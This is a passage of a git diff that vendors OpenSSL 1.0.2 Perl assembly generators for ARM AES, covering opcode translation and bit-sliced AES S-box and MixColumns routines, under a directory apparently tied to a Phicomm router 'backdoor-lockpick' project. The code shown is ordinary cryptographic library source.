+$code.=<<___	if ($flavour =~ /64/);
+	ldr		x29,[sp],#16
+	ret
+___
+$code.=<<___;
+.size	${prefix}_ctr32_encrypt_blocks,.-${prefix}_ctr32_encrypt_blocks
+___
+}}}
+$code.=<<___;
+#endif
+___
+########################################
+if ($flavour =~ /64/) {			######## 64-bit code
+    my %opcode = (
+	"aesd"	=>	0x4e285800,	"aese"	=>	0x4e284800,
+	"aesimc"=>	0x4e287800,	"aesmc"	=>	0x4e286800	);
+
+    local *unaes = sub {
+	my ($mnemonic,$arg)=@_;
+
+	$arg =~ m/[qv]([0-9]+)[^,]*,\s*[qv]([0-9]+)/o	&&
+	sprintf ".inst\t0x%08x\t//%s %s",
+			$opcode{$mnemonic}|$1|($2<<5),
+			$mnemonic,$arg;
+    };
+
+    foreach(split("\n",$code)) {
+	s/\`([^\`]*)\`/eval($1)/geo;
+
+	s/\bq([0-9]+)\b/"v".($1<8?$1:$1+8).".16b"/geo;	# old->new registers
+	s/@\s/\/\//o;			# old->new style commentary
+
+	#s/[v]?(aes\w+)\s+([qv].*)/unaes($1,$2)/geo	or
+	s/cclr\s+([wx])([^,]+),\s*([a-z]+)/csel	$1$2,$1zr,$1$2,$3/o	or
+	s/mov\.([a-z]+)\s+([wx][0-9]+),\s*([wx][0-9]+)/csel	$2,$3,$2,$1/o	or
+	s/vmov\.i8/movi/o	or	# fix up legacy mnemonics
+	s/vext\.8/ext/o		or
+	s/vrev32\.8/rev32/o	or
+	s/vtst\.8/cmtst/o	or
+	s/vshr/ushr/o		or
+	s/^(\s+)v/$1/o		or	# strip off v prefix
+	s/\bbx\s+lr\b/ret/o;
+
+	# fix up remainig legacy suffixes
+	s/\.[ui]?8//o;
+	m/\],#8/o and s/\.16b/\.8b/go;
+	s/\.[ui]?32//o and s/\.16b/\.4s/go;
+	s/\.[ui]?64//o and s/\.16b/\.2d/go;
+	s/\.[42]([sd])\[([0-3])\]/\.$1\[$2\]/o;
+
+	print $_,"\n";
+    }
+} else {				######## 32-bit code
+    my %opcode = (
+	"aesd"	=>	0xf3b00340,	"aese"	=>	0xf3b00300,
+	"aesimc"=>	0xf3b003c0,	"aesmc"	=>	0xf3b00380	);
+
+    local *unaes = sub {
+	my ($mnemonic,$arg)=@_;
+
+	if ($arg =~ m/[qv]([0-9]+)[^,]*,\s*[qv]([0-9]+)/o) {
+	    my $word = $opcode{$mnemonic}|(($1&7)<<13)|(($1&8)<<19)
+					 |(($2&7)<<1) |(($2&8)<<2);
+	    # since ARMv7 instructions are always encoded little-endian.
+	    # correct solution is to use .inst directive, but older
+	    # assemblers don't implement it:-(
+	    sprintf ".byte\t0x%02x,0x%02x,0x%02x,0x%02x\t@ %s %s",
+			$word&0xff,($word>>8)&0xff,
+			($word>>16)&0xff,($word>>24)&0xff,
+			$mnemonic,$arg;
+	}
+    };
+
+    sub unvtbl {
+	my $arg=shift;
+
+	$arg =~ m/q([0-9]+),\s*\{q([0-9]+)\},\s*q([0-9]+)/o &&
+	sprintf	"vtbl.8	d%d,{q%d},d%d\n\t".
+		"vtbl.8	d%d,{q%d},d%d", 2*$1,$2,2*$3, 2*$1+1,$2,2*$3+1;	
+    }
+
+    sub unvdup32 {
+	my $arg=shift;
+
+	$arg =~ m/q([0-9]+),\s*q([0-9]+)\[([0-3])\]/o &&
+	sprintf	"vdup.32	q%d,d%d[%d]",$1,2*$2+($3>>1),$3&1;	
+    }
+
+    sub unvmov32 {
+	my $arg=shift;
+
+	$arg =~ m/q([0-9]+)\[([0-3])\],(.*)/o &&
+	sprintf	"vmov.32	d%d[%d],%s",2*$1+($2>>1),$2&1,$3;	
+    }
+
+    foreach(split("\n",$code)) {
+	s/\`([^\`]*)\`/eval($1)/geo;
+
+	s/\b[wx]([0-9]+)\b/r$1/go;		# new->old registers
+	s/\bv([0-9])\.[12468]+[bsd]\b/q$1/go;	# new->old registers
+	s/\/\/\s?/@ /o;				# new->old style commentary
+
+	# fix up remainig new-style suffixes
+	s/\{q([0-9]+)\},\s*\[(.+)\],#8/sprintf "{d%d},[$2]!",2*$1/eo	or
+	s/\],#[0-9]+/]!/o;
+
+	s/[v]?(aes\w+)\s+([qv].*)/unaes($1,$2)/geo	or
+	s/cclr\s+([^,]+),\s*([a-z]+)/mov$2	$1,#0/o	or
+	s/vtbl\.8\s+(.*)/unvtbl($1)/geo			or
+	s/vdup\.32\s+(.*)/unvdup32($1)/geo		or
+	s/vmov\.32\s+(.*)/unvmov32($1)/geo		or
+	s/^(\s+)b\./$1b/o				or
+	s/^(\s+)mov\./$1mov/o				or
+	s/^(\s+)ret/$1bx\tlr/o;
+
+	print $_,"\n";
+    }
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/bsaes-armv7.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/bsaes-armv7.pl
new file mode 100644
index 0000000..fcc81d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/bsaes-armv7.pl
@@ -0,0 +1,2469 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+#
+# Specific modes and adaptation for Linux kernel by Ard Biesheuvel
+# <ard.biesheuvel@linaro.org>. Permission to use under GPL terms is
+# granted.
+# ====================================================================
+
+# Bit-sliced AES for ARM NEON
+#
+# February 2012.
+#
+# This implementation is direct adaptation of bsaes-x86_64 module for
+# ARM NEON. Except that this module is endian-neutral [in sense that
+# it can be compiled for either endianness] by courtesy of vld1.8's
+# neutrality. Initial version doesn't implement interface to OpenSSL,
+# only low-level primitives and unsupported entry points, just enough
+# to collect performance results, which for Cortex-A8 core are:
+#
+# encrypt	19.5 cycles per byte processed with 128-bit key
+# decrypt	22.1 cycles per byte processed with 128-bit key
+# key conv.	440  cycles per 128-bit key/0.18 of 8x block
+#
+# Snapdragon S4 encrypts byte in 17.6 cycles and decrypts in 19.7,
+# which is [much] worse than anticipated (for further details see
+# http://www.openssl.org/~appro/Snapdragon-S4.html).
+#
+# Cortex-A15 manages in 14.2/16.1 cycles [when integer-only code
+# manages in 20.0 cycles].
+#
+# When comparing to x86_64 results keep in mind that NEON unit is
+# [mostly] single-issue and thus can't [fully] benefit from
+# instruction-level parallelism. And when comparing to aes-armv4
+# results keep in mind key schedule conversion overhead (see
+# bsaes-x86_64.pl for further details)...
+#
+#						<appro@openssl.org>
+
+# April-August 2013
+#
+# Add CBC, CTR and XTS subroutines, adapt for kernel use.
+#
+#					<ard.biesheuvel@linaro.org>
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+my ($inp,$out,$len,$key)=("r0","r1","r2","r3");
+my @XMM=map("q$_",(0..15));
+
+{
+my ($key,$rounds,$const)=("r4","r5","r6");
+
+sub Dlo()   { shift=~m|q([1]?[0-9])|?"d".($1*2):"";     }
+sub Dhi()   { shift=~m|q([1]?[0-9])|?"d".($1*2+1):"";   }
+
+sub Sbox {
+# input in  lsb > [b0, b1, b2, b3, b4, b5, b6, b7] < msb
+# output in lsb > [b0, b1, b4, b6, b3, b7, b2, b5] < msb
+my @b=@_[0..7];
+my @t=@_[8..11];
+my @s=@_[12..15];
+	&InBasisChange	(@b);
+	&Inv_GF256	(@b[6,5,0,3,7,1,4,2],@t,@s);
+	&OutBasisChange	(@b[7,1,4,2,6,5,0,3]);
+}
+
+sub InBasisChange {
+# input in  lsb > [b0, b1, b2, b3, b4, b5, b6, b7] < msb
+# output in lsb > [b6, b5, b0, b3, b7, b1, b4, b2] < msb 
+my @b=@_[0..7];
+$code.=<<___;
+	veor	@b[2], @b[2], @b[1]
+	veor	@b[5], @b[5], @b[6]
+	veor	@b[3], @b[3], @b[0]
+	veor	@b[6], @b[6], @b[2]
+	veor	@b[5], @b[5], @b[0]
+
+	veor	@b[6], @b[6], @b[3]
+	veor	@b[3], @b[3], @b[7]
+	veor	@b[7], @b[7], @b[5]
+	veor	@b[3], @b[3], @b[4]
+	veor	@b[4], @b[4], @b[5]
+
+	veor	@b[2], @b[2], @b[7]
+	veor	@b[3], @b[3], @b[1]
+	veor	@b[1], @b[1], @b[5]
+___
+}
+
+sub OutBasisChange {
+# input in  lsb > [b0, b1, b2, b3, b4, b5, b6, b7] < msb
+# output in lsb > [b6, b1, b2, b4, b7, b0, b3, b5] < msb
+my @b=@_[0..7];
+$code.=<<___;
+	veor	@b[0], @b[0], @b[6]
+	veor	@b[1], @b[1], @b[4]
+	veor	@b[4], @b[4], @b[6]
+	veor	@b[2], @b[2], @b[0]
+	veor	@b[6], @b[6], @b[1]
+
+	veor	@b[1], @b[1], @b[5]
+	veor	@b[5], @b[5], @b[3]
+	veor	@b[3], @b[3], @b[7]
+	veor	@b[7], @b[7], @b[5]
+	veor	@b[2], @b[2], @b[5]
+
+	veor	@b[4], @b[4], @b[7]
+___
+}
+
+sub InvSbox {
+# input in lsb 	> [b0, b1, b2, b3, b4, b5, b6, b7] < msb
+# output in lsb	> [b0, b1, b6, b4, b2, b7, b3, b5] < msb
+my @b=@_[0..7];
+my @t=@_[8..11];
+my @s=@_[12..15];
+	&InvInBasisChange	(@b);
+	&Inv_GF256		(@b[5,1,2,6,3,7,0,4],@t,@s);
+	&InvOutBasisChange	(@b[3,7,0,4,5,1,2,6]);
+}
+
+sub InvInBasisChange {		# OutBasisChange in reverse (with twist)
+my @b=@_[5,1,2,6,3,7,0,4];
+$code.=<<___
+	 veor	@b[1], @b[1], @b[7]
+	veor	@b[4], @b[4], @b[7]
+
+	veor	@b[7], @b[7], @b[5]
+	 veor	@b[1], @b[1], @b[3]
+	veor	@b[2], @b[2], @b[5]
+	veor	@b[3], @b[3], @b[7]
+
+	veor	@b[6], @b[6], @b[1]
+	veor	@b[2], @b[2], @b[0]
+	 veor	@b[5], @b[5], @b[3]
+	veor	@b[4], @b[4], @b[6]
+	veor	@b[0], @b[0], @b[6]
+	veor	@b[1], @b[1], @b[4]
+___
+}
+
+sub InvOutBasisChange {		# InBasisChange in reverse
+my @b=@_[2,5,7,3,6,1,0,4];
+$code.=<<___;
+	veor	@b[1], @b[1], @b[5]
+	veor	@b[2], @b[2], @b[7]
+
+	veor	@b[3], @b[3], @b[1]
+	veor	@b[4], @b[4], @b[5]
+	veor	@b[7], @b[7], @b[5]
+	veor	@b[3], @b[3], @b[4]
+	 veor 	@b[5], @b[5], @b[0]
+	veor	@b[3], @b[3], @b[7]
+	 veor	@b[6], @b[6], @b[2]
+	 veor	@b[2], @b[2], @b[1]
+	veor	@b[6], @b[6], @b[3]
+
+	veor	@b[3], @b[3], @b[0]
+	veor	@b[5], @b[5], @b[6]
+___
+}
+
+sub Mul_GF4 {
+#;*************************************************************
+#;* Mul_GF4: Input x0-x1,y0-y1 Output x0-x1 Temp t0 (8) *
+#;*************************************************************
+my ($x0,$x1,$y0,$y1,$t0,$t1)=@_;
+$code.=<<___;
+	veor 	$t0, $y0, $y1
+	vand	$t0, $t0, $x0
+	veor	$x0, $x0, $x1
+	vand	$t1, $x1, $y0
+	vand	$x0, $x0, $y1
+	veor	$x1, $t1, $t0
+	veor	$x0, $x0, $t1
+___
+}
+
+sub Mul_GF4_N {				# not used, see next subroutine
+# multiply and scale by N
+my ($x0,$x1,$y0,$y1,$t0)=@_;
+$code.=<<___;
+	veor	$t0, $y0, $y1
+	vand	$t0, $t0, $x0
+	veor	$x0, $x0, $x1
+	vand	$x1, $x1, $y0
+	vand	$x0, $x0, $y1
+	veor	$x1, $x1, $x0
+	veor	$x0, $x0, $t0
+___
+}
+
+sub Mul_GF4_N_GF4 {
+# interleaved Mul_GF4_N and Mul_GF4
+my ($x0,$x1,$y0,$y1,$t0,
+    $x2,$x3,$y2,$y3,$t1)=@_;
+$code.=<<___;
+	veor	$t0, $y0, $y1
+	 veor 	$t1, $y2, $y3
+	vand	$t0, $t0, $x0
+	 vand	$t1, $t1, $x2
+	veor	$x0, $x0, $x1
+	 veor	$x2, $x2, $x3
+	vand	$x1, $x1, $y0
+	 vand	$x3, $x3, $y2
+	vand	$x0, $x0, $y1
+	 vand	$x2, $x2, $y3
+	veor	$x1, $x1, $x0
+	 veor	$x2, $x2, $x3
+	veor	$x0, $x0, $t0
+	 veor	$x3, $x3, $t1
+___
+}
+sub Mul_GF16_2 {
+my @x=@_[0..7];
+my @y=@_[8..11];
+my @t=@_[12..15];
+$code.=<<___;
+	veor	@t[0], @x[0], @x[2]
+	veor	@t[1], @x[1], @x[3]
+___
+	&Mul_GF4  	(@x[0], @x[1], @y[0], @y[1], @t[2..3]);
+$code.=<<___;
+	veor	@y[0], @y[0], @y[2]
+	veor	@y[1], @y[1], @y[3]
+___
+	Mul_GF4_N_GF4	(@t[0], @t[1], @y[0], @y[1], @t[3],
+			 @x[2], @x[3], @y[2], @y[3], @t[2]);
+$code.=<<___;
+	veor	@x[0], @x[0], @t[0]
+	veor	@x[2], @x[2], @t[0]
+	veor	@x[1], @x[1], @t[1]
+	veor	@x[3], @x[3], @t[1]
+
+	veor	@t[0], @x[4], @x[6]
+	veor	@t[1], @x[5], @x[7]
+___
+	&Mul_GF4_N_GF4	(@t[0], @t[1], @y[0], @y[1], @t[3],
+			 @x[6], @x[7], @y[2], @y[3], @t[2]);
+$code.=<<___;
+	veor	@y[0], @y[0], @y[2]
+	veor	@y[1], @y[1], @y[3]
+___
+	&Mul_GF4  	(@x[4], @x[5], @y[0], @y[1], @t[2..3]);
+$code.=<<___;
+	veor	@x[4], @x[4], @t[0]
+	veor	@x[6], @x[6], @t[0]
+	veor	@x[5], @x[5], @t[1]
+	veor	@x[7], @x[7], @t[1]
+___
+}
+sub Inv_GF256 {
+#;********************************************************************
+#;* Inv_GF256: Input x0-x7 Output x0-x7 Temp t0-t3,s0-s3 (144)       *
+#;********************************************************************
+my @x=@_[0..7];
+my @t=@_[8..11];
+my @s=@_[12..15];
+# direct optimizations from hardware
+$code.=<<___;
+	veor	@t[3], @x[4], @x[6]
+	veor	@t[2], @x[5], @x[7]
+	veor	@t[1], @x[1], @x[3]
+	veor	@s[1], @x[7], @x[6]
+	 vmov	@t[0], @t[2]
+	veor	@s[0], @x[0], @x[2]
+
+	vorr	@t[2], @t[2], @t[1]
+	veor	@s[3], @t[3], @t[0]
+	vand	@s[2], @t[3], @s[0]
+	vorr	@t[3], @t[3], @s[0]
+	veor	@s[0], @s[0], @t[1]
+	vand	@t[0], @t[0], @t[1]
+	veor	@t[1], @x[3], @x[2]
+	vand	@s[3], @s[3], @s[0]
+	vand	@s[1], @s[1], @t[1]
+	veor	@t[1], @x[4], @x[5]
+	veor	@s[0], @x[1], @x[0]
+	veor	@t[3], @t[3], @s[1]
+	veor	@t[2], @t[2], @s[1]
+	vand	@s[1], @t[1], @s[0]
+	vorr	@t[1], @t[1], @s[0]
+	veor	@t[3], @t[3], @s[3]
+	veor	@t[0], @t[0], @s[1]
+	veor	@t[2], @t[2], @s[2]
+	veor	@t[1], @t[1], @s[3]
+	veor	@t[0], @t[0], @s[2]
+	vand	@s[0], @x[7], @x[3]
+	veor	@t[1], @t[1], @s[2]
+	vand	@s[1], @x[6], @x[2]
+	vand	@s[2], @x[5], @x[1]
+	vorr	@s[3], @x[4], @x[0]
+	veor	@t[3], @t[3], @s[0]
+	veor	@t[1], @t[1], @s[2]
+	veor	@t[0], @t[0], @s[3]
+	veor	@t[2], @t[2], @s[1]
+
+	@ Inv_GF16 \t0, \t1, \t2, \t3, \s0, \s1, \s2, \s3
+
+	@ new smaller inversion
+
+	vand	@s[2], @t[3], @t[1]
+	vmov	@s[0], @t[0]
+
+	veor	@s[1], @t[2], @s[2]
+	veor	@s[3], @t[0], @s[2]
+	veor	@s[2], @t[0], @s[2]	@ @s[2]=@s[3]
+
+	vbsl	@s[1], @t[1], @t[0]
+	vbsl	@s[3], @t[3], @t[2]
+	veor	@t[3], @t[3], @t[2]
+
+	vbsl	@s[0], @s[1], @s[2]
+	vbsl	@t[0], @s[2], @s[1]
+
+	vand	@s[2], @s[0], @s[3]
+	veor	@t[1], @t[1], @t[0]
+
+	veor	@s[2], @s[2], @t[3]
+___
+# output in s3, s2, s1, t1
+
+# Mul_GF16_2 \x0, \x1, \x2, \x3, \x4, \x5, \x6, \x7, \t2, \t3, \t0, \t1, \s0, \s1, \s2, \s3
+
+# Mul_GF16_2 \x0, \x1, \x2, \x3, \x4, \x5, \x6, \x7, \s3, \s2, \s1, \t1, \s0, \t0, \t2, \t3
+	&Mul_GF16_2(@x,@s[3,2,1],@t[1],@s[0],@t[0,2,3]);
+
+### output msb > [x3,x2,x1,x0,x7,x6,x5,x4] < lsb
+}
+
+# AES linear components
+
+sub ShiftRows {
+my @x=@_[0..7];
+my @t=@_[8..11];
+my $mask=pop;
+$code.=<<___;
+	vldmia	$key!, {@t[0]-@t[3]}
+	veor	@t[0], @t[0], @x[0]
+	veor	@t[1], @t[1], @x[1]
+	vtbl.8	`&Dlo(@x[0])`, {@t[0]}, `&Dlo($mask)`
+	vtbl.8	`&Dhi(@x[0])`, {@t[0]}, `&Dhi($mask)`
+	vldmia	$key!, {@t[0]}
+	veor	@t[2], @t[2], @x[2]
+	vtbl.8	`&Dlo(@x[1])`, {@t[1]}, `&Dlo($mask)`
+	vtbl.8	`&Dhi(@x[1])`, {@t[1]}, `&Dhi($mask)`
+	vldmia	$key!, {@t[1]}
+	veor	@t[3], @t[3], @x[3]
+	vtbl.8	`&Dlo(@x[2])`, {@t[2]}, `&Dlo($mask)`
+	vtbl.8	`&Dhi(@x[2])`, {@t[2]}, `&Dhi($mask)`
+	vldmia	$key!, {@t[2]}
+	vtbl.8	`&Dlo(@x[3])`, {@t[3]}, `&Dlo($mask)`
+	vtbl.8	`&Dhi(@x[3])`, {@t[3]}, `&Dhi($mask)`
+	vldmia	$key!, {@t[3]}
+	veor	@t[0], @t[0], @x[4]
+	veor	@t[1], @t[1], @x[5]
+	vtbl.8	`&Dlo(@x[4])`, {@t[0]}, `&Dlo($mask)`
+	vtbl.8	`&Dhi(@x[4])`, {@t[0]}, `&Dhi($mask)`
+	veor	@t[2], @t[2], @x[6]
+	vtbl.8	`&Dlo(@x[5])`, {@t[1]}, `&Dlo($mask)`
+	vtbl.8	`&Dhi(@x[5])`, {@t[1]}, `&Dhi($mask)`
+	veor	@t[3], @t[3], @x[7]
+	vtbl.8	`&Dlo(@x[6])`, {@t[2]}, `&Dlo($mask)`
+	vtbl.8	`&Dhi(@x[6])`, {@t[2]}, `&Dhi($mask)`
+	vtbl.8	`&Dlo(@x[7])`, {@t[3]}, `&Dlo($mask)`
+	vtbl.8	`&Dhi(@x[7])`, {@t[3]}, `&Dhi($mask)`
+___
+}
+
+sub MixColumns {
+# modified to emit output in order suitable for feeding back to aesenc[last]
+my @x=@_[0..7];
+my @t=@_[8..15];
+my $inv=@_[16];	# optional
+$code.=<<___;
+	vext.8	@t[0], @x[0], @x[0], #12	@ x0 <<< 32
+	vext.8	@t[1], @x[1], @x[1], #12
+	 veor	@x[0], @x[0], @t[0]		@ x0 ^ (x0 <<< 32)
+	vext.8	@t[2], @x[2], @x[2], #12
+	 veor	@x[1], @x[1], @t[1]
+	vext.8	@t[3], @x[3], @x[3], #12
+	 veor	@x[2], @x[2], @t[2]
+	vext.8	@t[4], @x[4], @x[4], #12
+	 veor	@x[3], @x[3], @t[3]
+	vext.8	@t[5], @x[5], @x[5], #12
+	 veor	@x[4], @x[4], @t[4]
+	vext.8	@t[6], @x[6], @x[6], #12
+	 veor	@x[5], @x[5], @t[5]
+	vext.8	@t[7], @x[7], @x[7], #12
+	 veor	@x[6], @x[6], @t[6]
+
+	veor	@t[1], @t[1], @x[0]
+	 veor	@x[7], @x[7], @t[7]
+	 vext.8	@x[0], @x[0], @x[0], #8		@ (x0 ^ (x0 <<< 32)) <<< 64)
+	veor	@t[2], @t[2], @x[1]
+	veor	@t[0], @t[0], @x[7]
+	veor	@t[1], @t[1], @x[7]
+	 vext.8	@x[1], @x[1], @x[1], #8
+	veor	@t[5], @t[5], @x[4]
+	 veor	@x[0], @x[0], @t[0]
+	veor	@t[6], @t[6], @x[5]
+	 veor	@x[1], @x[1], @t[1]
+	 vext.8	@t[0], @x[4], @x[4], #8
+	veor	@t[4], @t[4], @x[3]
+	 vext.8	@t[1], @x[5], @x[5], #8
+	veor	@t[7], @t[7], @x[6]
+	 vext.8	@x[4], @x[3], @x[3], #8
+	veor	@t[3], @t[3], @x[2]
+	 vext.8	@x[5], @x[7], @x[7], #8
+	veor	@t[4], @t[4], @x[7]
+	 vext.8	@x[3], @x[6], @x[6], #8
+	veor	@t[3], @t[3], @x[7]
+	 vext.8	@x[6], @x[2], @x[2], #8
+	veor	@x[7], @t[1], @t[5]
+___
+$code.=<<___ if (!$inv);
+	veor	@x[2], @t[0], @t[4]
+	veor	@x[4], @x[4], @t[3]
+	veor	@x[5], @x[5], @t[7]
+	veor	@x[3], @x[3], @t[6]
+	 @ vmov	@x[2], @t[0]
+	veor	@x[6], @x[6], @t[2]
+	 @ vmov	@x[7], @t[1]
+___
+$code.=<<___ if ($inv);
+	veor	@t[3], @t[3], @x[4]
+	veor	@x[5], @x[5], @t[7]
+	veor	@x[2], @x[3], @t[6]
+	veor	@x[3], @t[0], @t[4]
+	veor	@x[4], @x[6], @t[2]
+	vmov	@x[6], @t[3]
+	 @ vmov	@x[7], @t[1]
+___
+}
+
+sub InvMixColumns_orig {
+my @x=@_[0..7];
+my @t=@_[8..15];
+
+$code.=<<___;
+	@ multiplication by 0x0e
+	vext.8	@t[7], @x[7], @x[7], #12
+	vmov	@t[2], @x[2]
+	veor	@x[2], @x[2], @x[5]		@ 2 5
+	veor	@x[7], @x[7], @x[5]		@ 7 5
+	vext.8	@t[0], @x[0], @x[0], #12
+	vmov	@t[5], @x[5]
+	veor	@x[5], @x[5], @x[0]		@ 5 0		[1]
+	veor	@x[0], @x[0], @x[1]		@ 0 1
+	vext.8	@t[1], @x[1], @x[1], #12
+	veor	@x[1], @x[1], @x[2]		@ 1 25
+	veor	@x[0], @x[0], @x[6]		@ 01 6		[2]
+	vext.8	@t[3], @x[3], @x[3], #12
+	veor	@x[1], @x[1], @x[3]		@ 125 3		[4]
+	veor	@x[2], @x[2], @x[0]		@ 25 016	[3]
+	veor	@x[3], @x[3], @x[7]		@ 3 75
+	veor	@x[7], @x[7], @x[6]		@ 75 6		[0]
+	vext.8	@t[6], @x[6], @x[6], #12
+	vmov	@t[4], @x[4]
+	veor	@x[6], @x[6], @x[4]		@ 6 4
+	veor	@x[4], @x[4], @x[3]		@ 4 375		[6]
+	veor	@x[3], @x[3], @x[7]		@ 375 756=36
+	veor	@x[6], @x[6], @t[5]		@ 64 5		[7]
+	veor	@x[3], @x[3], @t[2]		@ 36 2
+	vext.8	@t[5], @t[5], @t[5], #12
+	veor	@x[3], @x[3], @t[4]		@ 362 4		[5]
+___
+					my @y = @x[7,5,0,2,1,3,4,6];
+$code.=<<___;
+	@ multiplication by 0x0b
+	veor	@y[1], @y[1], @y[0]
+	veor	@y[0], @y[0], @t[0]
+	vext.8	@t[2], @t[2], @t[2], #12
+	veor	@y[1], @y[1], @t[1]
+	veor	@y[0], @y[0], @t[5]
+	vext.8	@t[4], @t[4], @t[4], #12
+	veor	@y[1], @y[1], @t[6]
+	veor	@y[0], @y[0], @t[7]
+	veor	@t[7], @t[7], @t[6]		@ clobber t[7]
+
+	veor	@y[3], @y[3], @t[0]
+	 veor	@y[1], @y[1], @y[0]
+	vext.8	@t[0], @t[0], @t[0], #12
+	veor	@y[2], @y[2], @t[1]
+	veor	@y[4], @y[4], @t[1]
+	vext.8	@t[1], @t[1], @t[1], #12
+	veor	@y[2], @y[2], @t[2]
+	veor	@y[3], @y[3], @t[2]
+	veor	@y[5], @y[5], @t[2]
+	veor	@y[2], @y[2], @t[7]
+	vext.8	@t[2], @t[2], @t[2], #12
+	veor	@y[3], @y[3], @t[3]
+	veor	@y[6], @y[6], @t[3]
+	veor	@y[4], @y[4], @t[3]
+	veor	@y[7], @y[7], @t[4]
+	vext.8	@t[3], @t[3], @t[3], #12
+	veor	@y[5], @y[5], @t[4]
+	veor	@y[7], @y[7], @t[7]
+	veor	@t[7], @t[7], @t[5]		@ clobber t[7] even more
+	veor	@y[3], @y[3], @t[5]
+	veor	@y[4], @y[4], @t[4]
+
+	veor	@y[5], @y[5], @t[7]
+	vext.8	@t[4], @t[4], @t[4], #12
+	veor	@y[6], @y[6], @t[7]
+	veor	@y[4], @y[4], @t[7]
+
+	veor	@t[7], @t[7], @t[5]
+	vext.8	@t[5], @t[5], @t[5], #12
+
+	@ multiplication by 0x0d
+	veor	@y[4], @y[4], @y[7]
+	 veor	@t[7], @t[7], @t[6]		@ restore t[7]
+	veor	@y[7], @y[7], @t[4]
+	vext.8	@t[6], @t[6], @t[6], #12
+	veor	@y[2], @y[2], @t[0]
+	veor	@y[7], @y[7], @t[5]
+	vext.8	@t[7], @t[7], @t[7], #12
+	veor	@y[2], @y[2], @t[2]
+
+	veor	@y[3], @y[3], @y[1]
+	veor	@y[1], @y[1], @t[1]
+	veor	@y[0], @y[0], @t[0]
+	veor	@y[3], @y[3], @t[0]
+	veor	@y[1], @y[1], @t[5]
+	veor	@y[0], @y[0], @t[5]
+	vext.8	@t[0], @t[0], @t[0], #12
+	veor	@y[1], @y[1], @t[7]
+	veor	@y[0], @y[0], @t[6]
+	veor	@y[3], @y[3], @y[1]
+	veor	@y[4], @y[4], @t[1]
+	vext.8	@t[1], @t[1], @t[1], #12
+
+	veor	@y[7], @y[7], @t[7]
+	veor	@y[4], @y[4], @t[2]
+	veor	@y[5], @y[5], @t[2]
+	veor	@y[2], @y[2], @t[6]
+	veor	@t[6], @t[6], @t[3]		@ clobber t[6]
+	vext.8	@t[2], @t[2], @t[2], #12
+	veor	@y[4], @y[4], @y[7]
+	veor	@y[3], @y[3], @t[6]
+
+	veor	@y[6], @y[6], @t[6]
+	veor	@y[5], @y[5], @t[5]
+	vext.8	@t[5], @t[5], @t[5], #12
+	veor	@y[6], @y[6], @t[4]
+	vext.8	@t[4], @t[4], @t[4], #12
+	veor	@y[5], @y[5], @t[6]
+	veor	@y[6], @y[6], @t[7]
+	vext.8	@t[7], @t[7], @t[7], #12
+	veor	@t[6], @t[6], @t[3]		@ restore t[6]
+	vext.8	@t[3], @t[3], @t[3], #12
+
+	@ multiplication by 0x09
+	veor	@y[4], @y[4], @y[1]
+	veor	@t[1], @t[1], @y[1]		@ t[1]=y[1]
+	veor	@t[0], @t[0], @t[5]		@ clobber t[0]
+	vext.8	@t[6], @t[6], @t[6], #12
+	veor	@t[1], @t[1], @t[5]
+	veor	@y[3], @y[3], @t[0]
+	veor	@t[0], @t[0], @y[0]		@ t[0]=y[0]
+	veor	@t[1], @t[1], @t[6]
+	veor	@t[6], @t[6], @t[7]		@ clobber t[6]
+	veor	@y[4], @y[4], @t[1]
+	veor	@y[7], @y[7], @t[4]
+	veor	@y[6], @y[6], @t[3]
+	veor	@y[5], @y[5], @t[2]
+	veor	@t[4], @t[4], @y[4]		@ t[4]=y[4]
+	veor	@t[3], @t[3], @y[3]		@ t[3]=y[3]
+	veor	@t[5], @t[5], @y[5]		@ t[5]=y[5]
+	veor	@t[2], @t[2], @y[2]		@ t[2]=y[2]
+	veor	@t[3], @t[3], @t[7]
+	veor	@XMM[5], @t[5], @t[6]
+	veor	@XMM[6], @t[6], @y[6]		@ t[6]=y[6]
+	veor	@XMM[2], @t[2], @t[6]
+	veor	@XMM[7], @t[7], @y[7]		@ t[7]=y[7]
+
+	vmov	@XMM[0], @t[0]
+	vmov	@XMM[1], @t[1]
+	@ vmov	@XMM[2], @t[2]
+	vmov	@XMM[3], @t[3]
+	vmov	@XMM[4], @t[4]
+	@ vmov	@XMM[5], @t[5]
+	@ vmov	@XMM[6], @t[6]
+	@ vmov	@XMM[7], @t[7]
+___
+}
+
+sub InvMixColumns {
+my @x=@_[0..7];
+my @t=@_[8..15];
+
+# Thanks to Jussi Kivilinna for providing pointer to
+#
+# | 0e 0b 0d 09 |   | 02 03 01 01 |   | 05 00 04 00 |
+# | 09 0e 0b 0d | = | 01 02 03 01 | x | 00 05 00 04 |
+# | 0d 09 0e 0b |   | 01 01 02 03 |   | 04 00 05 00 |
+# | 0b 0d 09 0e |   | 03 01 01 02 |   | 00 04 00 05 |
+
+$code.=<<___;
+	@ multiplication by 0x05-0x00-0x04-0x00
+	vext.8	@t[0], @x[0], @x[0], #8
+	vext.8	@t[6], @x[6], @x[6], #8
+	vext.8	@t[7], @x[7], @x[7], #8
+	veor	@t[0], @t[0], @x[0]
+	vext.8	@t[1], @x[1], @x[1], #8
+	veor	@t[6], @t[6], @x[6]
+	vext.8	@t[2], @x[2], @x[2], #8
+	veor	@t[7], @t[7], @x[7]
+	vext.8	@t[3], @x[3], @x[3], #8
+	veor	@t[1], @t[1], @x[1]
+	vext.8	@t[4], @x[4], @x[4], #8
+	veor	@t[2], @t[2], @x[2]
+	vext.8	@t[5], @x[5], @x[5], #8
+	veor	@t[3], @t[3], @x[3]
+	veor	@t[4], @t[4], @x[4]
+	veor	@t[5], @t[5], @x[5]
+
+	 veor	@x[0], @x[0], @t[6]
+	 veor	@x[1], @x[1], @t[6]
+	 veor	@x[2], @x[2], @t[0]
+	 veor	@x[4], @x[4], @t[2]
+	 veor	@x[3], @x[3], @t[1]
+	 veor	@x[1], @x[1], @t[7]
+	 veor	@x[2], @x[2], @t[7]
